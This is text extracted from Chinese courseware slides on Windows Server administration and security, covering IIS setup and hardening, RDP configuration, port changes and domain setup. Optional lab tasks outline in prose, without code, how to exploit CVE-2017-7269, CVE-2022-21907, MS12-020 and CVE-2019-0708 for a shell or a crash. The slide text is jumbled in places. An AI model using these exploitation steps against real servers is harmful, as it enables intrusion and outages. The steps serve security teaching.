Windows服務(wù)器配置與安全管理 第2版 課件 華馳 第4-8章 Windows服務(wù)器網(wǎng)站管理-Windows內(nèi)網(wǎng)安全_第1頁(yè)
Windows服務(wù)器配置與安全管理 第2版 課件 華馳 第4-8章 Windows服務(wù)器網(wǎng)站管理-Windows內(nèi)網(wǎng)安全_第2頁(yè)
Windows服務(wù)器配置與安全管理 第2版 課件 華馳 第4-8章 Windows服務(wù)器網(wǎng)站管理-Windows內(nèi)網(wǎng)安全_第3頁(yè)
Windows服務(wù)器配置與安全管理 第2版 課件 華馳 第4-8章 Windows服務(wù)器網(wǎng)站管理-Windows內(nèi)網(wǎng)安全_第4頁(yè)
Windows服務(wù)器配置與安全管理 第2版 課件 華馳 第4-8章 Windows服務(wù)器網(wǎng)站管理-Windows內(nèi)網(wǎng)安全_第5頁(yè)
已閱讀5頁(yè),還剩188頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

服務(wù)器配置與安全管理延遲符04

Windows服務(wù)器網(wǎng)站管理本任務(wù)是WindowsIIS服務(wù)的搭建,為了完成本任務(wù),首先學(xué)習(xí)Windows互聯(lián)網(wǎng)信息服務(wù)(IIS)的基礎(chǔ)知識(shí),其次在Windows2019上安裝IIS服務(wù)器,最后對(duì)IIS服務(wù)器進(jìn)行訪問測(cè)試。Windows服務(wù)器網(wǎng)站管理搭建WindowsIIS服務(wù)WindowsIIS服務(wù)安全配置WindowsIIS服務(wù)滲透*延遲符本任務(wù)是WindowsIIS服務(wù)的搭建此處添加標(biāo)題Addthistitle搭建WindowsIIS服務(wù)任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps首先學(xué)習(xí)Windows互聯(lián)網(wǎng)信息服務(wù)(IIS)的基礎(chǔ)知識(shí),其次在Windows2019上安裝IIS服務(wù)器,最后對(duì)IIS服務(wù)器進(jìn)行訪問測(cè)試。IIS的功能IIS版本在服務(wù)器管理器中添加"Web服務(wù)器(IIS)"設(shè)置“Web服務(wù)器(IIS)"相關(guān)參數(shù)測(cè)試IIS服務(wù)延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——

IIS的功能延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——

IIS版本延遲符IIS版本W(wǎng)indows版本備注IIS1.0WindowsNT3.51ServicePack3

IIS2.0WindowsNT4.0

IIS3.0WindowsNT4.0ServicePack3開始支持ASP的運(yùn)行環(huán)境IIS4.0WindowsNT4.0OptionPack支持ASP3.0IIS5.0Windows2000在安裝相關(guān)版本的NetFrameWork的RunTime之后,可支持ASP.NET1.0/1.1/2.0的運(yùn)行環(huán)境IIS6.0WindowsServer2003WindowsVistaHomePremiumWindowsXPProfessionalx64Editions

IIS7.0WindowsVistaWindowsServer2008Windows7在系統(tǒng)中已經(jīng)集成了NET3.5,可支持NET3.5及以下的版本IIS8.0Windows2012

IIS10Windows2016/Windows2019

此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——服務(wù)器管理器中添加"Web服務(wù)器(IIS)"延遲符進(jìn)入服務(wù)器管理器,開啟【服務(wù)器管理器】,點(diǎn)擊“添加角色和功能”此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——服務(wù)器管理器中添加"Web服務(wù)器(IIS)"延遲符點(diǎn)擊左邊“安裝類型”,然后單擊“基于角色或基于功能的安裝",再單擊“下一步(N)"單擊“從服務(wù)器池中選擇服務(wù)器",再單擊“本服務(wù)器的計(jì)算機(jī)名",這時(shí)只有本地IP,直接單擊“下一步(N)"此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——服務(wù)器管理器中添加"Web服務(wù)器(IIS)"延遲符這時(shí)角色列表內(nèi)找到“Web服務(wù)器(IIS)",單擊勾選它此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——設(shè)置“Web服務(wù)器(IIS)"相關(guān)參數(shù)延遲符單擊左邊“功能”,中間勾選“.NetFramework3.5”單擊左邊“角色服務(wù)器",在中間角色服務(wù)列表中選擇需要安裝的項(xiàng)目此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——設(shè)置“Web服務(wù)器(IIS)"相關(guān)參數(shù)延遲符單擊左邊“確認(rèn)”,勾選“如果需要,自動(dòng)重啟目標(biāo)服務(wù)器”,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——測(cè)試IIS服務(wù)延遲符客戶機(jī)訪問Windows2019Server的Web服務(wù)Windows服務(wù)器網(wǎng)站管理搭建WindowsIIS服務(wù)WindowsIIS服務(wù)安全配置WindowsIIS服務(wù)滲透*延遲符本任務(wù)是WindowsIIS服務(wù)的安全配置此處添加標(biāo)題AddthistitleWindowsIIS服務(wù)安全配置任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps首先學(xué)習(xí)IIS安全的理論知識(shí),其次在Windows2019上通過刪除默認(rèn)web站點(diǎn),給新建站點(diǎn)設(shè)置權(quán)限增加系統(tǒng)的安全性,再次刪除不使用的應(yīng)用程序擴(kuò)展,對(duì)Web服務(wù)的IP訪問作限制,最后查看IIS日志信息并設(shè)置記錄日志的字段。Web服務(wù)器IIS狀態(tài)IIS日志刪除和配置網(wǎng)站、對(duì)IIS用戶進(jìn)行權(quán)限管理

IIS擴(kuò)展服務(wù)配置IIS日志配置延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——Web服務(wù)器延遲符Web服務(wù)器也稱為WWW(WorldWideWeb)服務(wù)器,主要功能是提供網(wǎng)上信息瀏覽服務(wù)。WWW是Internet的多媒體信息查詢工具,是Internet上近年才發(fā)展起來(lái)的服務(wù),也是發(fā)展最快和目前用的最廣泛的服務(wù)。正是因?yàn)橛辛薟WW工具,才使得近年來(lái)Internet迅速發(fā)展,且用戶數(shù)量飛速增長(zhǎng)。Web服務(wù)器是可以向發(fā)出請(qǐng)求的瀏覽器提供文檔的程序。此處添加標(biāo)題Addthistitle必備知識(shí)——IIS狀態(tài)延遲符

當(dāng)用戶試圖通過HTTP或文件傳輸協(xié)議(FTP)訪問一臺(tái)正在運(yùn)行Internet信息服務(wù)(IIS)的服務(wù)器上的內(nèi)容時(shí),IIS返回一個(gè)表示該請(qǐng)求的狀態(tài)的數(shù)字代碼。該狀態(tài)代碼記錄在IIS日志中,同時(shí)也可能在Web瀏覽器或FTP客戶端顯示。狀態(tài)代碼可以指明具體請(qǐng)求是否已成功,還可以揭示請(qǐng)求失敗的確切原因,如200表示成功,IIS已成功處理請(qǐng)求;304表示未修改,客戶端請(qǐng)求的文檔已在其緩存中,文檔自緩存以來(lái)尚未被修改過;401.1表示登錄失敗,登錄嘗試不成功,可能因?yàn)橛脩裘蛎艽a無(wú)效等。此處添加標(biāo)題Addthistitle必備知識(shí)——IIS日志延遲符IIS日志是每個(gè)服務(wù)器管理者都必須學(xué)會(huì)查看的,服務(wù)器的一些狀況和訪問IP的來(lái)源都會(huì)記錄在IIS日志中此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——?jiǎng)h除和配置網(wǎng)站、對(duì)IIS用戶進(jìn)行權(quán)限管理延遲符刪除默認(rèn)網(wǎng)站新建用戶網(wǎng)站web服務(wù)器有多個(gè)IP時(shí),只監(jiān)聽提供服務(wù)的IP地址,Web(右鍵)->編輯綁定,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——?jiǎng)h除和配置網(wǎng)站、對(duì)IIS用戶進(jìn)行權(quán)限管理延遲符創(chuàng)建IIS管理員,打開本地服務(wù)器管理,雙擊“IIS管理器用戶”單擊右側(cè)菜單欄中的“添加用戶”,輸入用戶賬號(hào)和密碼,點(diǎn)擊“確認(rèn)”,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——?jiǎng)h除和配置網(wǎng)站、對(duì)IIS用戶進(jìn)行權(quán)限管理延遲符設(shè)置管理員權(quán)限,打開本地服務(wù)器管理,雙擊“功能委派”此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——擴(kuò)展服務(wù)配置延遲符刪除不使用的應(yīng)用程序擴(kuò)展此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——I擴(kuò)展服務(wù)配置延遲符設(shè)置IP訪問限制此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——I擴(kuò)展服務(wù)配置延遲符設(shè)置IP訪問限制此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——I擴(kuò)展服務(wù)配置延遲符自定義IIS返回的錯(cuò)誤信息此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——I擴(kuò)展服務(wù)配置延遲符通過在網(wǎng)站功能視圖中查看日志文件,了解web服務(wù)器的訪問狀況此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——IIS日志配置延遲符通過在網(wǎng)站功能視圖中查看日志文件,了解web服務(wù)器的訪問狀況此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——IIS日志配置延遲符通過在網(wǎng)站功能視圖中查看日志文件,了解web服務(wù)器的訪問狀況Windows服務(wù)器網(wǎng)站管理搭建WindowsIIS服務(wù)WindowsIIS服務(wù)安全配置WindowsIIS服務(wù)滲透*延遲符本任務(wù)是WindowsIIS服務(wù)的安全配置此處添加標(biāo)題AddthistitleWindowsIIS服務(wù)滲透*任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)是本項(xiàng)目的拓展內(nèi)容,首先講述了WindowsIIS服務(wù)器存在的安全隱患,其次介紹了兩個(gè)常見的IIS漏洞:CVE-2017-7269和CVE-2022-21907漏洞,展示如何利用這兩個(gè)漏洞獲取系統(tǒng)管理員權(quán)限,最后介紹了如何對(duì)IIS服務(wù)進(jìn)行安全加固。IIS的安全脆弱性CVE-2017-7269漏洞介紹CVE-2022-21907漏洞介紹WebDavCVE-2017-7269漏洞復(fù)現(xiàn)WindowsCVE-2022-21907漏洞復(fù)現(xiàn)延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——IIS的安全脆弱性延遲符IIS的安全脆弱性曾長(zhǎng)時(shí)間被業(yè)內(nèi)詬病,一旦IIS出現(xiàn)遠(yuǎn)程執(zhí)行漏洞威脅將會(huì)非常嚴(yán)重。遠(yuǎn)程執(zhí)行代碼漏洞存在于HTTP協(xié)議堆棧(HTTP.sys)中,當(dāng)HTTP.sys未正確分析經(jīng)特殊設(shè)計(jì)的HTTP請(qǐng)求時(shí)會(huì)導(dǎo)致此漏洞。成功利用此漏洞的攻擊者可以在系統(tǒng)賬戶的上下文中執(zhí)行任意代碼,可以導(dǎo)致IIS服務(wù)器所在機(jī)器藍(lán)屏或讀取其內(nèi)存中的機(jī)密數(shù)據(jù)。此處添加標(biāo)題Addthistitle必備知識(shí)——CVE-2017-7269漏洞介紹延遲符MicrosoftWindowsServer2003R2是美國(guó)微軟(Microsoft)公司發(fā)布的一套服務(wù)器操作系統(tǒng)。InternetInformationServices(IIS)是一套運(yùn)行于MicrosoftWindows中的互聯(lián)網(wǎng)基本服務(wù)。

在WindowsServer2003的IIS6.0的WebDAV服務(wù)的ScStoragePathFromUrl函數(shù)存在緩存區(qū)溢出漏洞,攻擊者可通過一個(gè)以“If:<http://”開始的較長(zhǎng)header頭的PROPFIND請(qǐng)求執(zhí)行任意代碼。

目前針對(duì)WindowsServer2003R2可以穩(wěn)定利用,該漏洞最早在2016年7,8月份開始在野外被利用。影響范圍MicrosoftWindowsServer2003R2開啟WebDAV服務(wù)的IIS6.0此處添加標(biāo)題Addthistitle必備知識(shí)——CVE-2022-21907漏洞介紹延遲符

由于HTTP協(xié)議棧(HTTP.sys)中的HTTPTrailerSupport功能存在邊界錯(cuò)誤可導(dǎo)致緩沖區(qū)溢出。未經(jīng)身份認(rèn)證的攻擊者可通過向目標(biāo)Web服務(wù)器發(fā)送特制的HTTP請(qǐng)求來(lái)處理數(shù)據(jù)包,利用此漏洞,從而在目標(biāo)系統(tǒng)上執(zhí)行任意代碼。利用此漏洞不需要身份認(rèn)證和用戶交互,微軟官方將其標(biāo)記為蠕蟲漏洞,并建議優(yōu)先修補(bǔ)受此漏洞影響的服務(wù)器。默認(rèn)情況下,WindowsServer2019和Windows10版本1809不易受到攻擊。除非用戶已通過EnableTrailerSupport注冊(cè)表值啟用HTTPTrailerSupport,否則系統(tǒng)不會(huì)受到攻擊。影響范圍此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

WebDavCVE-2017-7269漏洞復(fù)現(xiàn)延遲符在Kali上使用NC開啟監(jiān)聽運(yùn)行漏洞利用腳本此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

WebDavCVE-2017-7269漏洞復(fù)現(xiàn)漏洞復(fù)現(xiàn)延遲符成功返回shell,漏洞利用成功此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

WindowsCVE-2022-21907漏洞復(fù)現(xiàn)漏洞復(fù)現(xiàn)延遲符運(yùn)行檢測(cè)腳本對(duì)靶機(jī)進(jìn)行探測(cè)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

WindowsCVE-2022-21907漏洞復(fù)現(xiàn)漏洞復(fù)現(xiàn)延遲符成功返回shell,漏洞利用成功此處添加標(biāo)題Addthistitle項(xiàng)目總結(jié)——Windows服務(wù)器網(wǎng)站管理延遲符

本項(xiàng)目主要介紹了WindowsIIS服務(wù)器搭建、WindowsIIS服務(wù)的安全配置、查看IIS日志等,在項(xiàng)目實(shí)施中注重以問題為導(dǎo)向,在實(shí)踐中學(xué)習(xí)的方法,將團(tuán)結(jié)協(xié)作、嚴(yán)謹(jǐn)求實(shí)等思政元素融入教學(xué)中。CONTENTS目錄z走進(jìn)Windows服務(wù)器01

Windows服務(wù)器用戶管理02Windows服務(wù)器共享管理03Windows服務(wù)器網(wǎng)站管理04延遲符z06070805Windows服務(wù)器遠(yuǎn)程管理Windows域管理Windows應(yīng)用安全Windows內(nèi)網(wǎng)安全05Windows服務(wù)器遠(yuǎn)程管理工作中比較常用的是開啟Windows自帶的遠(yuǎn)程管理功能,這就必須開啟一個(gè)不安全的端口3389。本項(xiàng)目講解了如何安全開啟遠(yuǎn)程連接,以及通過更改遠(yuǎn)程連接端口來(lái)達(dá)到安全防護(hù)的目的。延遲符Windows服務(wù)器遠(yuǎn)程管理Windows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn)Windows遠(yuǎn)程訪問的安全配置Windows遠(yuǎn)程訪問服務(wù)的滲透*延遲符本任務(wù)是Windows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn)此處添加標(biāo)題AddthistitleWindows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn)任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)是Windows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn),為了完成本任務(wù),首先學(xué)習(xí)遠(yuǎn)程連接的理論知識(shí),其次以WindowsServer2019遠(yuǎn)程桌面為例,學(xué)習(xí)遠(yuǎn)程桌面連接的配置流程,最后對(duì)遠(yuǎn)程訪問訪問進(jìn)行測(cè)試。Windows遠(yuǎn)程桌面服務(wù)第三方遠(yuǎn)程桌面服務(wù)設(shè)置遠(yuǎn)程訪問用戶開啟“遠(yuǎn)程桌面”功能設(shè)置賬號(hào)權(quán)限延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——Windows遠(yuǎn)程桌面服務(wù)延遲符Windows遠(yuǎn)程桌面連接是一種遠(yuǎn)程操作電腦的模式,它可以用于可視化訪問遠(yuǎn)程計(jì)算機(jī)的桌面環(huán)境,用于管理員在客戶機(jī)上對(duì)遠(yuǎn)程計(jì)算機(jī)服務(wù)器進(jìn)行管理等場(chǎng)合。

此處添加標(biāo)題Addthistitle必備知識(shí)——第三方遠(yuǎn)程桌面服務(wù)延遲符(1)TeamViewerTeamViewer是一個(gè)非常受歡迎的產(chǎn)品,除了Windows遠(yuǎn)程桌面之外,它可能是周圍使用最廣泛的遠(yuǎn)程桌面軟件,它具有很強(qiáng)的靈活性,僅需要運(yùn)行一次,便可以長(zhǎng)期使用遠(yuǎn)程功能,或者可以使用高級(jí)安全規(guī)則對(duì)其進(jìn)行設(shè)置,在無(wú)人值守的情況下使用。TeamViewer支持的系統(tǒng)非常多,可以在Windows、MacOS、Linux和ChromeOS上安裝TeamViewer應(yīng)用程序。此外,還有適用于Android,IOS,WindowsPhone和BlackBerry等移動(dòng)客戶端應(yīng)用程序。(2)Chrome遠(yuǎn)程桌面Chrome遠(yuǎn)程桌面是這幾年Google為其ChromeWeb瀏覽器推出了遠(yuǎn)程桌面解決方案。Chrome遠(yuǎn)程桌面設(shè)置起來(lái)非常容易,而且完全免費(fèi),不過Chrome遠(yuǎn)程桌面僅能滿足基本的遠(yuǎn)程需求,像文件傳輸和遠(yuǎn)程打印這樣的高級(jí)功能是不支持的。但因?yàn)椴僮髌饋?lái)足夠簡(jiǎn)單,也受到了很多用戶的喜歡。(3)VNCVNC是一個(gè)開源的遠(yuǎn)程桌面解決方案,由于VNC是開源的,并且該協(xié)議免費(fèi)提供給任何人使用,因此很容易找到優(yōu)秀的VNC客戶端應(yīng)用程序此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——設(shè)置遠(yuǎn)程訪問用戶延遲符在WindowsServer2019中“控制面板”中單擊“用戶賬戶”此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——設(shè)置遠(yuǎn)程訪問用戶延遲符在“管理其他賬戶”中添加用戶ftp1,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——開啟“遠(yuǎn)程桌面”功能延遲符在WindowsServer2019中“控制面板”中單擊“系統(tǒng)和安全”,單擊“系統(tǒng)”,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——開啟“遠(yuǎn)程桌面”功能延遲符在“系統(tǒng)”中,單擊“遠(yuǎn)程設(shè)置”

,在“遠(yuǎn)程桌面連接”中單擊“允許遠(yuǎn)程連接到此電腦”,單擊“確定”,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——開啟“遠(yuǎn)程桌面”功能延遲符在“系統(tǒng)”中,單擊“遠(yuǎn)程設(shè)置”

,在“遠(yuǎn)程桌面連接”中單擊“允許遠(yuǎn)程連接到此電腦”,單擊“確定”,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——設(shè)置賬號(hào)權(quán)限延遲符在“服務(wù)器管理”中單擊“本地安全策略”,在“本地安全策略”用戶權(quán)限分配中“允許通過遠(yuǎn)程桌面服務(wù)登錄”中添加ftp1用戶此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——遠(yuǎn)程連接測(cè)試延遲符在物理機(jī)客戶端輸入“mstsc”,在彈出的對(duì)話框中輸入WindowsServer2019的IP地址,用戶名、密碼登錄桌面此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——遠(yuǎn)程連接測(cè)試延遲符在物理機(jī)客戶端輸入“mstsc”,在彈出的對(duì)話框中輸入WindowsServer2019的IP地址,用戶名、密碼登錄桌面Windows遠(yuǎn)程訪問的安全配置Windows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn)Windows遠(yuǎn)程訪問的安全配置Windows遠(yuǎn)程訪問服務(wù)的滲透*延遲符本任務(wù)是修改遠(yuǎn)程訪問服務(wù)端口,提升網(wǎng)絡(luò)訪問的安全性。此處添加標(biāo)題AddthistitleWindows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn)任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps首先學(xué)習(xí)遠(yuǎn)程桌面連接的默認(rèn)端口,其次學(xué)習(xí)通過注冊(cè)表修改遠(yuǎn)程訪問的端口號(hào)的方法,最后通過設(shè)置Windows防火墻使得修改過后的端口能被訪問。Windows遠(yuǎn)程桌面修改遠(yuǎn)程訪問服務(wù)端口防火墻限制遠(yuǎn)程訪問延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——Windows遠(yuǎn)程桌面延遲符

遠(yuǎn)程桌面是網(wǎng)絡(luò)管理員最常用的工具之一,尤其是外網(wǎng)訪問時(shí)非常方便,但是其默認(rèn)的3389端口容易受到攻擊,例如:一個(gè)客戶的服務(wù)器就曾因?yàn)闆]有更改默認(rèn)端口而遭到勒索病毒的攻擊,幸虧提前在其它設(shè)備做了備份,只是重裝服務(wù)器損失了一些時(shí)間。所以更改遠(yuǎn)程桌面的默認(rèn)端口是一項(xiàng)常規(guī)卻相對(duì)有效的手段。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——修改遠(yuǎn)程訪問服務(wù)端口延遲符

在“開始->運(yùn)行”菜單里輸入“regedit”,進(jìn)入注冊(cè)表編輯在注冊(cè)表中打開如下路徑此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——修改遠(yuǎn)程訪問服務(wù)端口延遲符

找到右側(cè)的“PortNumber",用十進(jìn)制方式顯示,默認(rèn)為3389,改為5261端口此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——修改遠(yuǎn)程訪問服務(wù)端口延遲符

在注冊(cè)表中打開如下路徑:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——修改遠(yuǎn)程訪問服務(wù)端口延遲符

找到右側(cè)的“PortNumber",用十進(jìn)制方式顯示,默認(rèn)為3389,改為同上的端口此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——修改遠(yuǎn)程訪問服務(wù)端口延遲符

找到右側(cè)的“PortNumber",用十進(jìn)制方式顯示,默認(rèn)為3389,改為同上的端口此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——防火墻限制遠(yuǎn)程訪問延遲符

控制面板->Windows防火墻->高級(jí)設(shè)置->入站規(guī)則->新建規(guī)則此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——防火墻限制遠(yuǎn)程訪問延遲符

控制面板->Windows防火墻->高級(jí)設(shè)置->入站規(guī)則->新建規(guī)則此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——防火墻限制遠(yuǎn)程訪問延遲符

選擇端口->協(xié)議和端口->TCP/特定本地端口,輸入5261,此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——防火墻限制遠(yuǎn)程訪問延遲符

選擇允許連接,下一步,選擇公用此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——防火墻限制遠(yuǎn)程訪問延遲符

名稱:遠(yuǎn)程桌面-新(TCP-In),描述:用于遠(yuǎn)程桌面服務(wù)的入站規(guī)則,以允許RDP通信刪除原有的遠(yuǎn)程桌面(TCP-In)規(guī)則Windows遠(yuǎn)程訪問的安全配置Windows服務(wù)器遠(yuǎn)程訪問的實(shí)現(xiàn)Windows遠(yuǎn)程訪問的安全配置Windows遠(yuǎn)程訪問服務(wù)的滲透*延遲符本任務(wù)是本項(xiàng)目的拓展內(nèi)容,本任務(wù)首先介紹如何利用工具對(duì)域內(nèi)的相關(guān)信息進(jìn)行搜集,再次介紹如何從域控制器上導(dǎo)出所有域用戶密碼,最后講述如何利用CVE-2021-42287和CVE-2022-1472漏洞對(duì)域環(huán)境進(jìn)行滲透測(cè)試。此處添加標(biāo)題AddthistitleWindows遠(yuǎn)程訪問服務(wù)的滲透*任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)是本項(xiàng)目的拓展內(nèi)容,為了完成本任務(wù),首先學(xué)習(xí)MS12-020、CVE-2019-0708遠(yuǎn)程訪問漏洞的理論知識(shí),其次利用這兩個(gè)漏洞對(duì)服務(wù)器進(jìn)行滲透測(cè)試。MS12-020漏洞介紹CVE-2019-0708漏洞介紹MS12-020漏洞復(fù)現(xiàn)CVE-2019-0708漏洞復(fù)現(xiàn)延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——MS12-020漏洞介紹延遲符

MS12-020漏洞的定義是指操作系統(tǒng)的遠(yuǎn)程桌面協(xié)議存在重大漏洞,入侵者(黑客)可以通過向遠(yuǎn)程桌面默認(rèn)端口(3389)發(fā)一系列特定RDP包,從而獲取超級(jí)管理員權(quán)限,進(jìn)而入侵系統(tǒng)。根據(jù)實(shí)際被入侵終端進(jìn)行分析,開放遠(yuǎn)程桌面服務(wù)并使用默認(rèn)的3389端口的會(huì)成為攻擊目標(biāo)。根據(jù)微軟的安全公告,Windows全系列操作系統(tǒng)(WinXP/Vista/Win7/Win2000/Win2003/Win2008)均存在受控威脅。此處添加標(biāo)題Addthistitle必備知識(shí)——CVE-2019-0708漏洞介紹延遲符

2019年5月14日,微軟發(fā)布了針對(duì)遠(yuǎn)程桌面服務(wù)的關(guān)鍵遠(yuǎn)程執(zhí)行代碼漏洞CVE-2019-0708的補(bǔ)丁,該漏洞影響某些舊版本的Windows。攻擊者一旦成功觸發(fā)該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,該漏洞的觸發(fā)無(wú)需任何用戶交互操作。這意味著,存在漏洞的計(jì)算機(jī)只要聯(lián)網(wǎng),無(wú)需任何操作,就可能遭遇黑客遠(yuǎn)程攻擊,運(yùn)行惡意代碼。其方式與2017年的WannaCry惡意軟件的傳播方式類似.成功利用此漏洞的攻擊者可以在目標(biāo)系統(tǒng)完成安裝應(yīng)用程序,查看、更改或刪除數(shù)據(jù),創(chuàng)建完全訪問權(quán)限的新賬戶等操作。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

MS12-020漏洞復(fù)現(xiàn)延遲符

實(shí)驗(yàn)環(huán)境靶機(jī):WindowsServer2008R2攻擊機(jī):KaliLinux實(shí)驗(yàn)步驟開啟靶機(jī)的遠(yuǎn)程服務(wù)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——MS12-020漏洞復(fù)現(xiàn)延遲符

打開KaliLinux中msf工具,使用ms12-020掃描模塊掃描靶機(jī)系統(tǒng),發(fā)現(xiàn)靶機(jī)系統(tǒng)存在漏洞使用攻擊模塊對(duì)其進(jìn)行滲透測(cè)試此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——MS12-020漏洞復(fù)現(xiàn)延遲符

靶機(jī)藍(lán)屏,漏洞利用成功此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——CVE-2019-0708漏洞復(fù)現(xiàn)延遲符

實(shí)驗(yàn)環(huán)境靶機(jī):WindowsServer2008R2攻擊機(jī):KaliLinux實(shí)驗(yàn)步驟同上一案例開啟靶機(jī)的遠(yuǎn)程服務(wù),在KaliLinux中運(yùn)行腳本,對(duì)靶機(jī)進(jìn)行滲透測(cè)試靶機(jī)出現(xiàn)藍(lán)屏,成功驗(yàn)證漏洞,此處添加標(biāo)題Addthistitle項(xiàng)目總結(jié)——

Windows服務(wù)器遠(yuǎn)程管理延遲符

二十大報(bào)告中強(qiáng)調(diào)了“職業(yè)學(xué)校學(xué)生要注重實(shí)踐能力的培養(yǎng)”,本項(xiàng)目主要講述了Windows2019設(shè)置遠(yuǎn)程連接的方法,修改遠(yuǎn)程訪問默認(rèn)端口提高系統(tǒng)的安全性的方法以及常見的遠(yuǎn)程連接漏洞。CONTENTS目錄z走進(jìn)Windows服務(wù)器01

Windows服務(wù)器用戶管理02Windows服務(wù)器共享管理03Windows服務(wù)器網(wǎng)站管理04延遲符z06070805Windows服務(wù)器遠(yuǎn)程管理Windows域管理Windows應(yīng)用安全Windows內(nèi)網(wǎng)安全06Windows域管理域是Windows網(wǎng)絡(luò)中獨(dú)立運(yùn)行的單位,也是Windows網(wǎng)絡(luò)操作系統(tǒng)的邏輯組織單元,它的安全管理在網(wǎng)絡(luò)服務(wù)中至關(guān)重要,本項(xiàng)目有三個(gè)任務(wù):域的搭建、域的管理,滲透域,通過本項(xiàng)目的學(xué)習(xí)提升學(xué)生對(duì)Windows域安全管理的能力。延遲符Windows域管理搭建域環(huán)境使用組策略管理域環(huán)境滲透Windows域*延遲符通過建立一個(gè)Windows域并使一臺(tái)主機(jī)加入這個(gè)域,為后面學(xué)習(xí)域的安全設(shè)置做準(zhǔn)備。此處添加標(biāo)題Addthistitle搭建域環(huán)境任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps通過建立一個(gè)Windows域并使一臺(tái)主機(jī)加入這個(gè)域,為后面學(xué)習(xí)域的安全設(shè)置做準(zhǔn)備。域的定義和作用域的部署域控制器的設(shè)置將計(jì)算機(jī)加入到域延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——域的定義和作用延遲符

“域”是一個(gè)相對(duì)嚴(yán)格的組織?!坝颉敝傅氖欠?wù)器控制網(wǎng)絡(luò)上的計(jì)算機(jī)能否加入的計(jì)算機(jī)組合。

